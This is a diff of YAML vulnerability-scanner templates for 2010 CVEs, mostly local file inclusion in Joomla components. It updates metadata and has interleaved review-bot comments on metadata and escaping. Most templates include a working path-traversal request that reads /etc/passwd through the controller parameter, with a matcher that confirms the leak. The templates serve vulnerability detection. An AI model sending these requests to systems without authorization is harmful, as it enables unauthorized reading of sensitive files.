http://www.exploit-db.com/exploits/12233 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57850 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1719 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.01671 + cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: moto-treks + product: com_mtfireeagle + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 
diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 612d9cc3fa..f423093ed6 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1722 info: name: Joomla! Component Online Market 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12177 - https://nvd.nist.gov/vuln/detail/CVE-2010-1722 - - http://web.archive.org/web/20140723201810/http://secunia.com/advisories/39409/ - http://www.exploit-db.com/exploits/12177 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57674 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1722 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_market + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index d1796e1f2b..8fffaead73 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml 
@@ -3,31 +3,37 @@ id: CVE-2010-1723 info: name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12289 - https://nvd.nist.gov/vuln/detail/CVE-2010-1723 - - http://web.archive.org/web/20140805101847/http://secunia.com/advisories/39524/ - http://www.exploit-db.com/exploits/12289 + - http://www.vupen.com/english/advisories/2010/0926 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1723 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01956 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_drawroot + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 96001f37f7..845055c6be 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1858 info: name: Joomla! Component SMEStorage - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11853 - https://nvd.nist.gov/vuln/detail/CVE-2010-1858 - - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/ - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57108 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1858 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01155 + cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gelembjuk + product: com_smestorage + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index f51e245222..c57eaff005 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml 
@@ -3,21 +3,26 @@ id: CVE-2010-1870 info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd - severity: info + severity: medium description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - https://www.exploit-db.com/exploits/14360 - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16 + - http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html classification: - cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 - tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl + epss-score: 0.03864 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: struts + tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl http: - method: GET diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index e5e01d0064..93313a230d 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml 
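Review bot: The new `cpe`, `vendor: apache` and `product: struts` metadata describe Apache Struts, whereas the template name, description and `listserv` tag target ListSERV Maestro <= 9.0-8; the Struts CPE is presumably what NVD attaches to CVE-2010-1870 (the XWork OGNL bug), but as written the metadata will route this template to Struts product searches and not to ListSERV ones. I'd add `# NVD CPE for the underlying Struts2/XWork flaw; the request itself targets ListSERV Maestro` next to the CPE so the mismatch is deliberate rather than a copy error. Raising severity from info to medium is an improvement, though a CVSS v2 5.0 (`C:N/I:P/A:N`) understates an OGNL remote code execution; if the repository rule is "severity follows cvss-score" that is defensible, but worth stating in a comment. The `http:` section continues outside the hunk.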
@@ -8,26 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/11851 - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - - http://web.archive.org/web/20140802140355/http://secunia.com/advisories/39074/ - - http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/ + - http://www.exploit-db.com/exploits/11851 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01724 + cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: com-property + product: com_properties + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index b7e1ce6f80..16a6c6778b 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml 
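Review bot: The reference `http://www.exploit-db.com/exploits/11851` added in the com_properties hunk duplicates the `https://www.exploit-db.com/exploits/11851` entry already first in the list; drop the plain-http copy and keep the X-Force link that was added with it. The payload uses thirteen `../` segments where most siblings use ten, which is harmless but worth a `# depth kept from the original PoC` comment if intentional. The `status: 200` condition added under `matchers-condition: and` can only suppress a hit the `root:.*:0:0:` regex has already confirmed.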
@@ -8,26 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12317 - https://nvd.nist.gov/vuln/detail/CVE-2010-1878 - - http://web.archive.org/web/20210121195712/https://www.securityfocus.com/bid/39606/ - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58031 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1878 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00826 + cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: blueflyingfish.no-ip + product: com_orgchart + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 4547145d0a..47ac9294fe 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml 
@@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12239 - https://nvd.nist.gov/vuln/detail/CVE-2010-1952 - - http://web.archive.org/web/20151016194238/http://secunia.com/advisories/39475/ - http://www.exploit-db.com/exploits/12239 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57845 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1952 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cmstactics + product: com_beeheard + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index a1d32b283c..acfb3dd5c0 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1953 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.05684 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_multimap + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index f53f57ea13..4d1be5522d 100644 --- a/http/cves/2010/CVE-2010-1954.yaml 
+++ b/http/cves/2010/CVE-2010-1954.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12287 - https://nvd.nist.gov/vuln/detail/CVE-2010-1954 - - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/ - http://www.exploit-db.com/exploits/12287 + - http://www.vupen.com/english/advisories/2010/0928 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1954 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.05684 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_multiroot + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index c1d4bf15f9..158a2512c2 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml 
@@ -8,27 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12238 - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - - http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/ - - http://web.archive.org/web/20140803091440/http://secunia.com/advisories/39473/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1955 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.01671 + cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_blogfactory + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 525338fdda..96cfb215e2 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml 
@@ -8,27 +8,34 @@ info: reference: - https://www.exploit-db.com/exploits/12285 - https://nvd.nist.gov/vuln/detail/CVE-2010-1956 - - http://web.archive.org/web/20140805105431/http://secunia.com/advisories/39522/ - http://www.exploit-db.com/exploits/12285 + - http://www.thefactory.ro/all-thefactory-products/gadget-factory-for-joomla-1.5.x/detailed-product-flyer.html + - http://www.vupen.com/english/advisories/2010/0930 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1956 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.06055 + cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_gadgetfactory + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index bfc3674cd6..ef07a880c9 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -9,15 +9,20 @@ info: - https://www.exploit-db.com/exploits/12235 - https://nvd.nist.gov/vuln/detail/CVE-2010-1957 - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57849 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1957 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.01671 + cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_lovefactory + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET 
@@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index ab64b59947..efbe552f45 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1977 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00826 + cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gohigheris + product: com_jwhmcs + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index b755873d71..07670c883b 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml 
@@ -3,22 +3,26 @@ id: CVE-2010-1979 info: name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12088 - https://nvd.nist.gov/vuln/detail/CVE-2010-1979 - - http://web.archive.org/web/20140724185517/http://secunia.com/advisories/39360/ - http://www.exploit-db.com/exploits/12088 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57570 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1979 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00826 + cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: affiliatefeeds + product: com_datafeeds + tags: edb,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index ec6581b133..a4968faa69 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml 
@@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1980 - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt - http://www.exploit-db.com/exploits/12085 + - http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1980 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.02401 + cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: roberto_aloi + product: com_joomlaflickr + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 140b1e9262..2dadcf4575 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml 
@@ -3,22 +3,28 @@ id: CVE-2010-1981 info: name: Joomla! Component Fabrik 2.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12087 - https://nvd.nist.gov/vuln/detail/CVE-2010-1981 - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt - http://www.exploit-db.com/exploits/12087 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57571 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1981 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00656 + cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: fabrikar + product: fabrik + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 06e997b4d7..a3035e45ed 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1982 info: name: Joomla! Component JA Voice 2.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12121 
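Review bot: The new metadata line `framework: joomla\!` carries the CPE 2.3 escape sequence into a plain YAML scalar, where the backslash is kept literally, so the loaded value is `joomla\!` rather than `joomla!`; the `\!` only has meaning inside the `cpe:` string above it. If `framework` is meant to be a human-readable name like the `vendor:` and `product:` fields added alongside it, it should be written unescaped, e.g. `framework: "joomla!"` (quoted so the trailing `!` is not misread as a tag indicator), or as the bare `joomla` the template's tags already use — which form the repo expects is not visible from this diff. The same carry-over appears in the CVE-2010-4239 hunk at the end of this chunk, where the added `product: tikiwiki_cms\/groupware` keeps the `\/` escape while the other added `product:` values are plain names.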
@@ -16,9 +16,13 @@ info: cvss-score: 5 cve-id: CVE-2010-1982 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00477 + cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlart + product: com_javoice + tags: cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 8ead882707..4f76e50da3 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1983 - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt - http://www.exploit-db.com/exploits/12055 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57511 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1983 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.01815 + cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: redcomponent + product: com_redtwitter + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 4b9c526519..b885207246 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2033 cwe-id: CWE-22 - tags: packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.00826 + cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchacategoriestree + tags: packetstorm,cve,cve2010,joomla,lfi http: - method: GET 
@@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index b4ed8ecf78..14273b3928 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2034 cwe-id: CWE-22 - cvss-score: 7.5 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchaimageattach + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 6829d4b263..d7c6ef1cbd 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 - cvss-score: 7.5 - tags: packetstorm,cve,cve2010,joomla,lfi,edb + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchagallery + tags: packetstorm,cve,cve2010,joomla,lfi,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 6c466e29b1..32338a27cf 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml 
@@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2036 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,lfi,joomla,edb,packetstorm,cve + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchafieldsattach + tags: cve2010,lfi,joomla,edb,packetstorm,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 98edd8178e..b08f6315d0 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -13,12 +13,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-2037 cwe-id: CWE-22 - cvss-score: 7.5 - tags: joomla,edb,packetstorm,cve,cve2010,lfi + epss-score: 0.00718 + cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: percha + product: com_perchadownloadsattach + tags: joomla,edb,packetstorm,cve,cve2010,lfi http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 81656ed53a..afa6643c0f 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml 
